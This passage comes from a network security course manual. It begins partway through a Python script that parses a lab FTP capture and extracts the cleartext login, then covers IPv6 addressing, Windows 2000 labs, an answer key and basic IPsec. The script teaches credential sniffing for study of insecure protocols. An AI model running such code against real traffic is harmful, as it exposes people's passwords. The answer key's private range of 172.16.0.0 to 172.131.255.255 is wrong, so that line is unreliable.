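    credentials: dict = field(default_factory=dict)  # USER/PASS exactly as sent
    anomalies: list = field(default_factory=list)


def analyze(frames):
    """Replay the frames, checking that each segment continues its sender's sequence
    space and each ACK covers exactly what the peer has sent, and lift the FTP
    dialogue (including the cleartext login) out of the payloads."""
    sess = Session()
    next_seq = {}    # endpoint -> next sequence number we expect from it
    fins = set()
    for f in frames:
        if "S" in f.flags:
            # Active Open (SYN) or Passive Open (SYN/ACK); each consumes one seq number.
            if "A" in f.flags and f.ack != next_seq.get(f.dst):
                sess.anomalies.append("frame %d: SYN/ACK ack %#x, expected %#x"
                                      % (f.no, f.ack, next_seq.get(f.dst, 0)))
            next_seq[f.src] = f.seq + 1
            sess.state = "SYN_RECEIVED" if "A" in f.flags else "SYN_SENT"
            sess.handshake.append(f.no)
            continue
        if f.seq != next_seq.get(f.src):
            sess.anomalies.append("frame %d: seq %#x, expected %#x"
                                  % (f.no, f.seq, next_seq.get(f.src, 0)))
        if f.ack != next_seq.get(f.dst):
            sess.anomalies.append("frame %d: ack %#x, expected %#x"
                                  % (f.no, f.ack, next_seq.get(f.dst, 0)))
        if sess.state == "SYN_RECEIVED":        # third leg of the handshake
            sess.state = "ESTABLISHED"
            sess.handshake.append(f.no)
        next_seq[f.src] = f.seq + len(f.payload) + ("F" in f.flags)
        if f.payload:
            text = f.payload.decode("ascii", "replace").rstrip("\r\n")
            sess.ftp_lines.append((f.no, "C>S" if f.src == CLIENT else "S>C", text))
            verb, _, arg = text.partition(" ")
            if verb.upper() in ("USER", "PASS"):
                sess.credentials[verb.upper()] = arg   # readable by anyone on the path
        if "F" in f.flags:
            fins.add(f.src)
            sess.teardown.append(f.no)
            sess.state = "CLOSED" if len(fins) == 2 else "FIN_WAIT"
    return sess


if __name__ == "__main__":
    s = analyze(FRAMES)
    print("handshake frames:", s.handshake, "| FIN frames:", s.teardown, "| state:", s.state)
    for no, direction, line in s.ftp_lines:
        print("frame %2d %s %s" % (no, direction, line))
    print("credentials readable on the wire:", s.credentials)
    print("anomalies:", s.anomalies or "none")
```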

Topic 1I

Fundamentals of IPv6

It has been estimated by the U.S. Census Bureau that by the year 2050 there will be over 9 billion people living on Earth. If we (for the moment, putting economics aside) are to attempt to provide the full use of the Internet to every person on the planet, the current version of the Internet Protocol will likely be unable to handle the demand. When we do the math, we can quickly calculate that IP version 4, or IPv4, will allow for only 4 billion addresses. Even if we take into consideration technologies such as Network Address Translation (NAT), it becomes quickly obvious that an improvement is required.

The need for IP addresses is also not taking into consideration the expected surge in PDAs, cell phones with Web access, and many other different types of devices that will connect to the Internet. It is reasonable to expect that every person on the planet will have a need for far more than one IP address.

From an addressing perspective, you may wonder how many IPv6 addresses are available, when compared to IPv4. As you know, IPv4 is a 32-bit number, offering approximately 4 billion addresses. IPv6 addresses are 128-bit numbers, which—if you take the time to do the math—works out to approximately 340 trillion, trillion, trillion addresses (or 3.4 x 10^38). There are a few formatting issues, where a portion of the address space may not be used for single addresses; however, by most estimates, even after formatting, the low-end number that will remain is 35 trillion addresses. This should be more than enough addresses for each person on the planet having every device imaginable connected to the Internet, with many addresses remaining.

If the need for addressing was not enough of a driving factor to show the need for IPv6, another issue to consider is the IPv4 routing tables. As more and more people, and devices, use the Internet, the routing tables are getting more and more complex. Imagine the routing table once every current IPv4 address is used. Routing will become quite difficult to manage.

IPv6 Addresses

Because IPv6 presents a solution to the addressing and other problems that are starting to become prominent on the Internet, we will take a look into the basics of this protocol, starting with the addresses of version 6. An IPv6 address is a 128-bit number, which (for now) is not divided into the classes that are used in IPv4 addressing. The address is written in 8 blocks of 16 bits, using hexadecimal numbering, and separated by a colon. The following two lines are examples of IPv6 addresses:

8ab2:1cc3:2fa4:0:6b8a:31a2:9ef3:85bc

1012:321:544:300:0:0:0:17

IPv6 Addresses

IPv6 Address Formats

A few points on the above addresses need to be clarified further. There does not need to be a full four characters per block, such as in the address that is all decimal. Additionally, it is possible to identify consecutive blocks of 0 using two colons (::). When the two colons are used, be aware that they can only appear once in an IP address. Using the two colons, the second address from above would look like this:

1012:321:544:300::17

Another type of address that can be present is called the dotted decimal suffix address. This is used during the transition between IPv4 and IPv6. This address combines the traditional IPv4 address with the hexadecimal used in IPv6. An example of this type of address would look like this:

::ffff:192.168.100.23

The final type of address to investigate is the loopback address. This address is quite different from the IPv4 address of 127.0.0.1. In IPv6, the loopback address is much smaller, and looks like this:

::1

Unicasting and Multicasting

In IPv6, the concepts of broadcasting and multicasting of IPv4 are helpful, but do not directly link the two protocols together on these grounds. For example, in IPv6, there is no broadcast address at all. What are used are unicast, anycast, and multicast addresses.

• Unicast addresses are identifiers for a single interface, and are what packets are addressed to when sent to a specific interface. There are two unicast addresses used in IPv6 that we will address in this topic:

— Link-local unicast address. Link-local addresses have been designed to use on a single link, such as when no routers are present.

— Site-local unicast address. Site-local addresses are designed for use by organizations that intend to connect to the Internet, and can be routed.

• A multicast address is an identifier for a group of interfaces, and is what packets are addressed to when sending to groups of interfaces. Some of the defined addresses for multicasting are:

— To address all nodes: FF01::1 or FF02::1.

— To address all router nodes: FF01::2 or FF02::2.

• The anycast address is also an identifier for a group of interfaces. When a packet is sent to an anycast address, it is delivered to one of the interfaces that are identified by the address (often referred to as the nearest one).
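To make the notation rules and the address categories above concrete, here is an added Python example (not from the course materials): a hand-written parser for the colon-hexadecimal forms shown (unpadded blocks, a single ::, the dotted-decimal suffix and the loopback address), the canonical compressed form, and a classifier for the unicast and multicast prefixes discussed. The standard library's ipaddress module is used only to cross-check the parser.

```python
"""IPv6 textual notation (expand / compress) and address-type classification.

Added example, not part of the course materials.  The rules implemented are the
ones stated in the text: unpadded hex blocks, a single '::' standing for a run of
zero blocks, a dotted-decimal IPv4 suffix, and the loopback, link-local,
site-local and multicast prefixes.  ipaddress is used only to cross-check."""
import ipaddress


def expand_ipv6(text: str) -> list:
    """Return the eight 16-bit blocks of an address in colon-hex notation.
    '::' may appear at most once and must stand for at least one block."""
    if text.count("::") > 1:
        raise ValueError("'::' may appear only once: %r" % text)
    if "." in text:
        # Dotted-decimal suffix: the last group carries an IPv4 address,
        # which occupies the final two 16-bit blocks.
        head, _, v4 = text.rpartition(":")
        octets = [int(o) for o in v4.split(".")]
        if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
            raise ValueError("bad IPv4 suffix in %r" % text)
        text = "%s:%x:%x" % (head, (octets[0] << 8) | octets[1],
                             (octets[2] << 8) | octets[3])
    if "::" in text:
        left, right = text.split("::")
        left_blocks = [int(b, 16) for b in left.split(":")] if left else []
        right_blocks = [int(b, 16) for b in right.split(":")] if right else []
        missing = 8 - len(left_blocks) - len(right_blocks)
        if missing < 1:
            raise ValueError("'::' must replace at least one block: %r" % text)
        blocks = left_blocks + [0] * missing + right_blocks
    else:
        blocks = [int(b, 16) for b in text.split(":")]
    if len(blocks) != 8 or not all(0 <= b <= 0xFFFF for b in blocks):
        raise ValueError("not eight 16-bit blocks: %r" % text)
    return blocks


def compress_ipv6(blocks: list) -> str:
    """Canonical text form: lowercase hex, no leading zeros, and the longest run
    of two or more zero blocks (leftmost on a tie) written as '::'."""
    best_start, best_len, run_start = -1, 1, None
    for i, b in enumerate(blocks + [None]):      # the sentinel closes a final run
        if b == 0:
            run_start = i if run_start is None else run_start
        elif run_start is not None:
            if i - run_start > best_len:
                best_start, best_len = run_start, i - run_start
            run_start = None
    words = ["%x" % b for b in blocks]
    if best_start < 0:
        return ":".join(words)
    return ":".join(words[:best_start]) + "::" + ":".join(words[best_start + best_len:])


def to_int(blocks: list) -> int:
    value = 0
    for b in blocks:
        value = (value << 16) | b
    return value


def matches_stdlib(text: str) -> bool:
    """Cross-check: the hand-written parser and ipaddress must agree on the value."""
    return to_int(expand_ipv6(text)) == int(ipaddress.IPv6Address(text))


def classify_ipv6(blocks: list) -> str:
    """Name the address type by prefix, following the categories in the text.
    (Site-local fec0::/10 is described as the course does; RFC 3879 later
    deprecated it in favour of unique local addresses.)"""
    if blocks == [0] * 7 + [1]:
        return "loopback"
    if blocks[:5] == [0] * 5 and blocks[5] == 0xFFFF:
        return "ipv4-mapped"
    first = blocks[0]
    if (first >> 8) == 0xFF:
        # ff0s::/16: the low nibble of the second byte is the multicast scope.
        scope = {1: "interface-local", 2: "link-local", 5: "site-local"}
        return "multicast (%s scope)" % scope.get(first & 0xF, "other")
    if (first & 0xFFC0) == 0xFE80:
        return "link-local unicast"
    if (first & 0xFFC0) == 0xFEC0:
        return "site-local unicast"
    return "global unicast"


if __name__ == "__main__":
    for sample in ("8ab2:1cc3:2fa4:0:6b8a:31a2:9ef3:85bc", "1012:321:544:300:0:0:0:17",
                   "::ffff:192.168.100.23", "::1", "FF02::1", "fe80::2d0:9ff:fe7f:b21"):
        blocks = expand_ipv6(sample)
        print("%-40s -> %-26s %s (stdlib agrees: %s)" % (
            sample, compress_ipv6(blocks), classify_ipv6(blocks), matches_stdlib(sample)))
```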

In IPv6, when a node is searching for another node on the network, this is called neighbor discovery. The ARP process used in IPv4 is not used in IPv6. Instead, what is used are ICMP and multicasting. Because the process uses ICMP, this allows for more media independence and allows for IP security to be used, versus ARP.

IPv6 X-casting

Routers in IPv6 networks do not forward packets that are from link-local addresses.

IPv6 Security

One of the advantages that IPv6 presents over IPv4, in addition to the address-space and routing issues, is security. Although IPv4 allows for the addition of security by using IPSec, it is not mandated. In an IPv6 network, the use of IPSec is much more streamlined, because the functionality is built right in.

In IPv6, there are two extension headers that are used to increase security. These two are called the Authentication Header (AH) and the Encapsulating Security Payload (ESP).

The IP Authentication Header (AH) is used for providing authentication and integrity. Keep in mind that AH does not encrypt the datagram, so confidentiality is not provided. And, although IPv6 datagrams are not encrypted by default, IPv6 does support multiple authentication techniques and algorithms.

The Encapsulating Security Payload Header is used to provide both integrity and confidentiality on the IPv6 datagrams. In this implementation, ESP supports Tunnel Mode, in which the whole IP packet is encrypted and a new unencrypted IP header is added, and Transport Mode, in which only the payload (along with any options) is encrypted.

To install the IPv6 stack on Windows 2000 Professional or Server, you must be running at least SP1 and running the IPv4 stack. To install the stack on Windows 2000 running SP2 or higher, there are a few additional steps that need to be taken to get it running successfully. The IPv6 stack is included with Windows XP, and can be run by entering ipv6 install at the command prompt. The IPv6 stack runs parallel to the existing IPv4 stack, so there should be no conflicts.

TASK 1I-1

Installing IPv6

Setup: You are logged on to Windows 2000 Server as Administrator.

1. Open the Network And Dial-up Connections Control Panel, and disable the Classroom Hub interface.

2. At the root of your boot partition, create a folder called IPv6test.

Authentication Header: A field that immediately follows the IP header in an IP datagram and provides authentication and integrity checking for the datagram.

ESP: (Encapsulating Security Payload) A mechanism to provide confidentiality and integrity protection to IP datagrams.

authentication: To positively verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.

confidentiality: Assuring information will be kept secret, with access limited to appropriate persons.

For the tasks in this topic, you will use IPv6 on Windows 2000. Microsoft has released the IPv6 Technology Preview for educational and research functions. It is not intended for commercial use at this time.

3. Copy the file tpipv6-001205.exe from the location specified by your instructor to the new folder.

4. From the local folder IPv6test, run tpipv6-001205.exe, and extract the filesto the same location.

5. Open the Run dialog box, and enter \ipv6test\setup.exe -x, and extract the files to a subfolder of the current folder (for example, \IPv6test\files). Click OK to close the Extraction Complete information box.

6. Start a text editor, and open the file Hotfix.inf, which should be in the folder containing the extracted files (\IPv6test\files).

7. In the Version section of the Hotfix.inf file, change the line NTServicePackVersion=256 to NTServicePackVersion=512 and save the change.

Close the text editor.

8. From the folder containing the extracted files (IPv6test\files), run Hotfix.exe.

9. When you are prompted to do so, click OK to reboot the computer to Windows 2000 Server. Log back on as Administrator.

10. Right-click My Network Places, and choose Properties.

11. Double-click the Ethernet interface that’s labeled Partner, and click Properties.

12. Click the Install button.

13. Select Protocol, and click Add.

14. Select the Microsoft IPv6 Protocol and click OK.

15. Click Close twice.

Provide students with the location of the IPv6 installation files.

16. Open a command prompt, and enter the command ipv6 if. You should see output resembling the following graphic.

17. Minimize the command prompt.

IPv6 Interfaces

In the previous task, when you issued the ipv6 if command, you saw that there are four interfaces, numbered sequentially from 4 to 1.

• Interface 1 is used for IPv6 loopback. It is always a pseudo-interface.

• Interface 2 is used for configured tunneling, automatic tunneling, and 6-to-4 tunneling. It is always a pseudo-interface.

• Interface 3 is a 6-over-4 interface.

• Interface 4 is the Ethernet interface.

Interfaces are numbered sequentially in the order created. This numbering will vary from computer to computer.

6-over-4 Interfaces

Take another look at the output for Interface 3. This interface has a link-layer address of the form a.b.c.d. Now, as far as the OSI Model is concerned, you know that addresses of the form a.b.c.d are IPv4 Network layer addresses. However, when IPv6 in its present form has to be tunneled over IPv4, the Network layer IPv4 address a.b.c.d is treated as a link-layer address by IPv6.

You will have one 6-over-4 interface for every IPv4 address assigned to your computer. This means that, in the previous example, if you add a second IPv4 address to an interface, such as 192.168.16.1, and run the ipv6 if command again, you will see a fifth listing in addition to the other four.

IPv6 Interface Types

The terms link-local address and link-level address are often used interchangeably.

Figure 1-21: Additional virtual interface for second IP address.

The link-local address of a 6-over-4 interface is FE80::a.b.c.d, expressed in IPv6 colon-hexadecimal notation. For example, for the IPv4 address 172.27.10.1, the corresponding link-local address is fe80::ac1b:a01 (because 172 = 0xAC, 27 = 0x1B, 10 = 0xA, and 1 = 0x1; therefore 172.27.10.1 = 0xAC1BA01). RFC 2529 provides more information about 6-over-4.

Ethernet Interfaces

Take another look at Interface 4 (the Ethernet interface). This interface has a link-local address of fe80::2d0:9ff:fe7f:b21. The format of this address is fe80::2-half-the-MAC:ff:fe-the-other-half-of-the-MAC. Of course, the actual method of calculating this value is slightly different, but we will worry about that later.

Interfaces that are listed with the traditional, 48-bit, link-layer address are Ethernet interfaces. You should have one Ethernet interface for every Ethernet adapter. The link-local address of the Ethernet interface will use the IPv6 interface identifier derived from the MAC address. For example, if the link-level address is 00-20-78-03-a5-b7, then the preferred address is listed as fe80::220:78ff:fe03:a5b7.
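The two derivations above (the 6-over-4 address from an IPv4 address, and the Ethernet address from a MAC) are worked through in this added Python example, which is not from the course materials. It fills in the "slightly different" step the text defers: the modified EUI-64 rule inserts ff:fe in the middle of the MAC and flips the universal/local bit, which is why 00-20-78-... becomes 220:78ff:fe.... It also reverses the derivation, because an EUI-64 interface identifier hands the hardware address to every peer that sees the IPv6 address, the privacy concern that later led to randomized identifiers.

```python
"""Link-local address derivation for 6-over-4 and Ethernet interfaces.

Added example, not part of the course materials.  Standard library only;
ipaddress supplies the canonical compressed text form."""
import ipaddress

LINK_LOCAL_PREFIX = 0xFE80 << 112   # fe80::/64 with an all-zero subnet field
IID_MASK = (1 << 64) - 1            # low 64 bits = interface identifier


def six_over_four_link_local(ipv4: str) -> str:
    """6-over-4 (RFC 2529): the 32-bit IPv4 address itself is the interface
    identifier, i.e. fe80::a.b.c.d written in colon-hex."""
    octets = [int(o) for o in ipv4.split(".")]
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError("not a dotted-decimal IPv4 address: %r" % ipv4)
    iid = int.from_bytes(bytes(octets), "big")
    return ipaddress.IPv6Address(LINK_LOCAL_PREFIX | iid).compressed


def eui64_interface_id(mac: str) -> int:
    """Modified EUI-64 (RFC 2464 / RFC 4291 App. A): split the 48-bit MAC in
    the middle, insert 0xFFFE, and flip the universal/local bit (0x02 of the
    first byte).  The flip is why 00-20-78-... shows up as 0220:78ff:fe..."""
    parts = mac.replace(":", "-").split("-")
    if len(parts) != 6:
        raise ValueError("not a 48-bit MAC address: %r" % mac)
    b = bytes(int(p, 16) for p in parts)
    eui = b[:3] + b"\xff\xfe" + b[3:]
    return int.from_bytes(bytes([eui[0] ^ 0x02]) + eui[1:], "big")


def ethernet_link_local(mac: str) -> str:
    """Link-local address of an Ethernet interface: fe80:: + modified EUI-64."""
    return ipaddress.IPv6Address(LINK_LOCAL_PREFIX | eui64_interface_id(mac)).compressed


def mac_from_link_local(addr: str) -> str:
    """Reverse the derivation; only possible when the ff:fe marker is present,
    which is exactly what makes EUI-64 identifiers a tracking concern."""
    eui = (int(ipaddress.IPv6Address(addr)) & IID_MASK).to_bytes(8, "big")
    if eui[3:5] != b"\xff\xfe":
        raise ValueError("interface identifier is not EUI-64 derived: %r" % addr)
    mac = bytes([eui[0] ^ 0x02]) + eui[1:3] + eui[5:]
    return "-".join("%02x" % x for x in mac)


if __name__ == "__main__":
    print("172.27.10.1        ->", six_over_four_link_local("172.27.10.1"))
    print("00-20-78-03-a5-b7  ->", ethernet_link_local("00-20-78-03-a5-b7"))
    print("fe80::2d0:9ff:fe7f:b21 came from MAC", mac_from_link_local("fe80::2d0:9ff:fe7f:b21"))
```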

TASK 1I-2

Getting Another 6-over-4 Address

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt and the Network And Dial-up Connections Control Panel are open.

1. Double-click the Partner interface, and click Properties.

2. Double-click Internet Protocol (TCP/IP).

3. Click Advanced. You should see an IP address listed, such as 172.26.10.z or 172.28.10.z.

4. In the IP Addresses box, click Add.

If you are on the LEFT side of the classroom, add the IP address 192.168.26.z. For the value z, use the same value as the last octet of your existing IP address. Leave the subnet mask at 255.255.255.0.

If you are on the RIGHT side of the classroom, add the IP address 192.168.28.z. For the value z, use the same value as the last octet of your existing IP address. Leave the subnet mask at 255.255.255.0.

5. Click Add, then click OK three times, and then click Close.

6. Switch to the command prompt, and enter the ipv6 if command.

7. Verify that the output reflects a new 6-over-4 address based on the new IP address you just added.

8. Remove the IP address that you just added.

IPv6 Utilities

Just as the TCP/IP stack for IPv4 comes with troubleshooting tools such as ping, tracert, and so forth, the IPv6 stack also provides some built-in tools, such as:

• ipv6

• ipsec6

• ping6

• tracert6

• 6to4cfg

• ttcp

• net

The net command has many subcommands, and their corresponding arguments and options, such as net stop and net start, will enable you to stop or start services. You can use this to stop or start IPv6. You should know that if you stop and start IPv6, you may end up changing interface numbers (after interfaces 1 and 2 are accounted for), because doing this is equivalent to reinitializing the interfaces after a reboot.

IPv6 Utilities

The ipv6.exe Command

You can use the ipv6.exe command to manually configure interfaces, retrieve information about the state of the interfaces, and so forth. All configuration of IPv6 protocol parameters can be done with this command. You can also use it to query and configure addresses, caches, and routes, by using the many subcommands and their corresponding arguments and options. In fact, you have already used this command with the if option to view information on interfaces.

TASK 1I-3

Interface Initializing

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.

1. At the command prompt, enter net stop tcpip6 to stop the IPv6 stack.

2. Enter ipv6 if, and observe the response. You should see a message stating that the IPv6 protocol stack could not be accessed.

3. Enter net start tcpip6 to restart the IPv6 stack.

4. Enter ipv6 if, and verify that you receive output relating to the interfaces.

Using the ipsec6.exe Command

You can use the ipsec6.exe command to configure IPSec policies and SAs (Security Associations) for the IPv6 protocol. As with ipv6.exe, ipsec6.exe has many subcommands, each with its own set of arguments and options. IPSec is covered in greater depth later in the course.

TASK 1I-4

Using the ipsec6 Command

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.

1. At the command prompt, enter ipsec6 -? to get help on the ipsec6 command.

2. Observe the explanation for the switches sp and sa. These switches enable you to print the security policy and security associations entries to the screen.

3. Enter ipsec6 sp, and observe the output, which wraps around in your display.

4. Enter ipsec6 sa, and observe the output, which again wraps around in your display. These entries are quite wide, in terms of the number of ASCII characters used; therefore, you will redirect the output from these commands to text files and use Notepad to view them.

5. Enter ipsec6 sp > sp-out.txt to direct the output to a new file called sp-out.txt.

6. Enter ipsec6 sa > sa-out.txt to direct the output to a new file called sa-out.txt.

7. Locate the two text files you just created, and open them in Notepad.

8. In the file sp-out.txt, observe that you do not have a security policy.

9. In the file sa-out.txt, observe that you do not have a security association.

If you want to use IPSec with IPv6, you first need to create similar text files using the ipsec6 command with the c switch, followed by a file name; for example, ipsec6 c secur. Two files will automatically be created for you—one with the extension .spd and the other with the extension .sad—which, as you can figure out by now, means that security-policy descriptors need to be entered in the SPD file and security-association descriptors need to be entered in the SAD file.

10. Close Notepad.

Using the ping6.exe Command

You can use the ping6 command with IPv6 just as you use ping with IPv4. By using this command, you send ICMPv6 Echo Request messages, and can evaluate the corresponding replies.

TASK 1I-5

Using the ping6 Command

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.

1. Enter ping -? to get help on the ping command.

2. Enter ping6 -?, and compare the versions of ping for IPv4 and IPv6.

3. Enter ipv6 if.

Record the first preferred address under the link-local address:

Each address will be different.

4. Enter ping6 neighboring_IPv6_address, and observe the output. You should see output similar to the following graphic.

Capturing and Analyzing IPv6 Traffic

By now, you’re probably beginning to wonder how this IPv6 ping packet would be different from an IPv4 ping packet. So let’s perform some captures.

You can use Network Monitor to perform these captures, if you install the appropriate add-ons, or parsers. We will use Ethereal, however, as the current version (which we installed and examined earlier) includes IPv6 support without having to install any add-ons.

TASK 1I-6

Capturing and Analyzing IPv6 Traffic

Setup: You are logged on to Windows 2000 Server as Administrator. IPv6 has been installed, and a command prompt is open.

Note: For this task, you should work in pairs.

1. On one machine, start Ethereal. (From the Start menu, choose Programs→Ethereal→Ethereal.)

2. Start a capture.

3. In the Interface selection box, select the adapter you want to perform the capture on.

4. Click OK.

5. In the command prompt window, enter ping6 neighboring_IPv6_address, and watch the activity taking place with respect to the four echo replies.

6. In Ethereal, stop the capture.

7. Highlight the ICMPv6 Echo Requests and Replies, and view their contents.

8. What is the Ethertype for IPv6?

0x86dd.

9. Start another capture.

10. This time, from the neighboring machine, enter tracert6 neighboring_IPv6_address, and watch the activity taking place with respect to the traceroute.

11. In Ethereal, stop the capture.

12. Highlight the ICMPv6 Echo Requests and Replies, and view their contents.

13. Observe the differences in contents, compared to the ping6 packets.

Note: Perform the rest of this task on all computers.

14. Stop the IPv6 stack by using the net stop tcpip6 command.

15. Re-enable the Classroom Hub interface.

16. Close all open windows.

Summary

In this lesson, you looked deep into the structure of the TCP/IP protocol. You reviewed the RFCs associated with IP, ICMP, TCP, and UDP. You then used Network Monitor and Ethereal to capture and analyze IP packets. You examined captures associated with network traffic. You learned to read the actual data being transmitted between two or more hosts. Finally, you analyzed a complete session, frame-by-frame. You also took a look at a technology preview of IPv6.

Lesson Review

1A How many layers are in the OSI Model?

Seven.

How many layers are in the TCP/IP Model?

Four.

What are the assignable classes of IP addresses?

A, B, and C.

What are the three private ranges of IP addresses, as defined in the RFCs?

a. 10.0.0.0 to 10.255.255.255

b. 172.16.0.0 to 172.131.255.255

c. 192.168.0.0 to 192.168.255.255

1B How many control flags are in a TCP header?

Six.

What is the function of an acknowledgement number?

To provide an acknowledgement for a received packet. The value is usually tied into the SYN number on the received packet.

How many steps are required to establish a TCP connection?

Three.

How many steps are required to tear down a TCP connection?

Four.

What are the two main views of Network Monitor?

Display View and Capture View.

1C What is the first field that is read by the computer in the IP header?

Version.

What is the Protocol ID of ICMP in the IP header?

1.

What is the Protocol ID of TCP in the IP header?

6.

What is the Protocol ID of UDP in the IP header?

17.

1D What is the first field that is read by the computer in the ICMP message?

Type.

How many bits make up the Type field?

Eight.

How many bits make up the Code field?

Eight.

1E What is the first field that is read by the computer in the TCP header?

Source Port Number.

How many control bits are in the TCP header?

Six.

How many bits is the Sequence Number?

32.

How many bits is the Acknowledgement Number?

32.

1F What is the first field that is read by the computer in the UDP header?

Source Port Number.

What is the UDP header and data encapsulated in?

An IP datagram.

How many bits are both the source and destination port numbers?

16.

What is in the payload of the tftp.cap file that you analyzed?

Cisco Router Configuration and Access Lists.

1G In the fragment.cap file that you analyzed, how do you suppose this fragmentation happened?

By a user sending a large ping. (See the file fragment.txt, in the same folder as fragment.cap, to understand how this was initiated.)

Why is there no upper-layer protocol list in the Detail pane for frames 2 through 13?

These are the subsequent fragments whose upper-layer protocol is referred to in the first fragment; therefore, they do not have any header information other than IP.

What was the upper-layer protocol that caused the fragmentation?

ICMP.

1H In the FTP capture file that you analyzed in this topic, what pair of sockets are involved in the initial three-way handshake?

On the client: IP address 172.16.30.2, port 2025. On the FTP Server: IP address 172.16.30.1, port 21.

In the FTP capture file that you analyzed in this topic, what pair of sockets are involved in the exchange of FTP data in response to the request for directory listing?

On the FTP Server: IP address 172.16.30.1, port 20. On the client: IP address 172.16.30.2, port 2026.

In the FTP capture file that you analyzed in this topic, what frames indicate that a three-way handshake is taking place between the FTP server and the client in preparation for the sending of FTP data in response to the request for the file textfile.txt?

Frames 35, 36, and 37.

1I What is the essential difference between a link-local and a site-local unicast address?

Scope. A link-local address (fe80::/10) is valid only on the link the interface is attached to and is never forwarded by a router. A site-local address (fec0::/10, since deprecated) can be routed between subnets within a site, but not onto the global Internet.

List some of the utilities provided to you by Microsoft in its IPv6 technology preview.

Some of the utilities are ipv6, ipsec6, ping6, tracert6, 6to4cfg, and ttcp.

What are the two files required to configure ipsec6 with ipv6 in Windows 2000?

Filename.spd (the security policy database) and filename.sad (the security association database).


LESSON 2: Implementing IPSec

Overview

In this lesson, you will be introduced to the concepts of IPSec. You will examine and configure the Microsoft Management Console and identify the predefined IPSec policies in Windows 2000. You will create new policies and implement IPSec to specifically use AH, ESP, or both, in Transport Mode. Finally, you will analyze IPSec traffic in Network Monitor.

Objectives

To be able to implement IPSec, you will:

2A Define the function of IPSec in a networked environment.

Given a running network, you will examine the IPSec structure, cryptography, the Encapsulating Security Payload, the Authentication Header, the Internet Key Exchange, and modes of implementation.

2B Examine IPSec policy management.

Given a Windows 2000 computer, you will use the Microsoft Management Console to examine the predefined IPSec policies and their rules, filter actions, authentication methods, and key exchange settings.

2C Implement and examine IPSec AH configurations.

Given a Windows 2000 computer, you will implement and analyze IPSec AH sessions.

2D Implement and examine IPSec ESP configurations.

Given a Windows 2000 computer, you will implement and analyze IPSec ESP sessions.

2E Implement and examine IPSec AH and ESP configurations.

Given a Windows 2000 computer, you will implement and analyze IPSec AH and ESP sessions.

Data Files
newroot.cer

Lesson Time
3 hours, 30 minutes


Topic 2A: Internet Protocol Security

The Internet Protocol (IP) by itself has no security. There are no built-in mechanisms to protect the packets. An attacker can craft packets with a forged source IP address, and can intercept packets in transit across the Internet and read their payload. As a result, the security professional has no way to guarantee any of the following:

• That a packet is from the source IP address.

• That a packet was not copied or intercepted by a third party duringtransmission.

• That a packet holds the original data that was transmitted.

These issues combine to illustrate that security of the packets themselves isrequired.

IPSec, or IP Security (described in detail in RFC 2401) can provide this security.In the simplest definition, IPSec protects IP datagrams. In a more detailed defini-tion, IPSec provides confidentiality, integrity, and authentication.

• Confidentiality means there is a system of making the data unreadable byunauthorized individuals.

• Integrity means that there is a guarantee that data is not altered between thesender and the receiver.

• Authentication means that the receiver is guaranteed that the sender is not animposter.

The way that IPSec is able to provide this protection is by specifying how thenetwork traffic is going to be protected, and to whom the traffic will be sent. Theway the traffic is going to be protected will be through an IPSec protocol such asthe Authentication Header (AH) or the Encapsulating Security Payload (ESP).

The operation of IPSec is completely transparent to the end user, because IPSec works at the Network layer: AH and ESP are carried directly inside IP, each with its own IP protocol number (51 for AH, 50 for ESP), well below the Application layer. This automatic protection is a significant factor in the decision whether or not to implement IPSec. The end result is that network traffic is protected on one end and verified or decrypted on the other, without the upper-layer applications at either end having to deal with the complexities of the encryption and decryption process.


Cryptography and Keys

IPSec is able to provide protection by encrypting and decrypting data. Although a detailed discussion of cryptography is beyond the scope of this book, the very basics are required. (A detailed discussion and hands-on study of cryptography and encryption techniques will be undertaken in Level 2 of the SCP.)

Any file before encryption is typically referred to as plaintext. Once that file isencrypted, using a mathematical algorithm, it is referred to as ciphertext. In orderto decrypt this file (or message), you must have a key that can reverse theencryption. You can think of an encryption algorithm as a lock and the key as thelock’s combination. If a document is locked, you need a key to unlock it. Oftenin cryptography, one key is used to lock (encrypt) the document, and the samekey or a different key is used to unlock (decrypt) the document, depending uponthe methodology chosen. If a different key is used, the two keys are linked toeach other via the algorithm and the associated mathematical functions.

IPSec requires that users have a method of exchanging (sometimes called negoti-ating) their keys.

• One method is called manual distribution. In its simplest form, this literally means each user handing his or her key to every other user. At any real scale, manual distribution is more likely to be done through what is called a KDC, or Key Distribution Center.

• The second method is automatic distribution. With automatic distribution, keys are negotiated only when they are needed. The default IPSec method of automatic key distribution is called Internet Key Exchange (IKE). You can also use an automated KDC, such as a Kerberos implementation.

Modes

IPSec has the ability to protect either the complete IP packet or just the upper-layer protocols. The distinction between the two creates two different modes of implementation.

• One mode is called Transport Mode. In this implementation, IPSec is pro-tecting upper-layer protocols.

• The other mode is called Tunnel Mode. In this implementation, IPSec pro-tects the entire (tunneled) IP payload.

When Transport Mode is used, the IPSec headers (AH and/or ESP) are inserted between the IP header and the upper-layer header (TCP, UDP, ICMP, and so on). When Tunnel Mode is used, the IPSec header is inserted between a new outer IP header and the original IP header, which is now carried as tunneled payload. Tunnel Mode is commonly used to create VPNs between networks.

Along with a mode, you must decide whether to use AH, ESP, or both. Since there are two modes of implementation and two protocols to choose from, there are four basic combinations of protection using IPSec. You can use any of the following:

• ESP in Transport Mode

• ESP in Tunnel Mode

• AH in Transport Mode

• AH in Tunnel Mode

cryptography: The art or science concerning the principles, means, and methods for rendering plaintext unintelligible and for converting encrypted messages into intelligible form.

plaintext: Unencrypted data.

key: A symbol or sequence of symbols (or electrical or mechanical correlates of symbols) applied to text in order to encrypt or decrypt.


Over and above that, ESP offers message integrity (authentication) and confidentiality (encryption). AH offers only integrity and origin authentication, with no encryption, but its integrity check also covers the IP header itself (every field except those that legitimately change in transit, such as the TTL and the header checksum). That is why AH does not survive Network Address Translation: a NAT device that rewrites the source address invalidates the AH integrity value, whereas ESP's integrity check starts at the ESP header and does not cover the outer IP addresses. Tunnel Mode ESP encrypts all of the tunneled data (that is, the tunneled IP header and everything within), while Transport Mode ESP does not, and cannot, encrypt the IP header. Thus the IPSec combination that offers the maximum protection is ESP in Tunnel Mode.

